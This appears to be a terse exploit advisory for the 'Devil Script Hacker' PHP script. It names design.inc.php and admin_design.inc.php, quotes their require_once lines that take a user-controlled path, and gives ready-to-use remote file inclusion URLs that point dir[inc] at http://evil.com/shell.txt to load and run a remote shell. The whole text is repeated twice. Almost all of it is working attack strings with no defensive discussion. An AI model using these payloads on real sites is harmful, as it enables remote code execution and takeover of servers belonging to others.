Devil
Script Hacker
Vulnerable code:
/inc/design.inc.php
/inc/admin_design.inc.php
require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]prof.inc.php" );
http://site.com/[script_path]/inc/design.inc.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/admin_design.inc.php?dir[inc]=http://evil.com/shell.txt ?
/inc/design.inc.php
/inc/admin_design.inc.php
require_once( "$dir[inc]db.inc.php" );
require_once( "$dir[inc]prof.inc.php" );
http://site.com/[script_path]/inc/design.inc.php?dir[inc]=http://evil.com/shell.txt?
http://site.com/[script_path]/inc/admin_design.inc.php?dir[inc]=http://evil.com/shell.txt ?
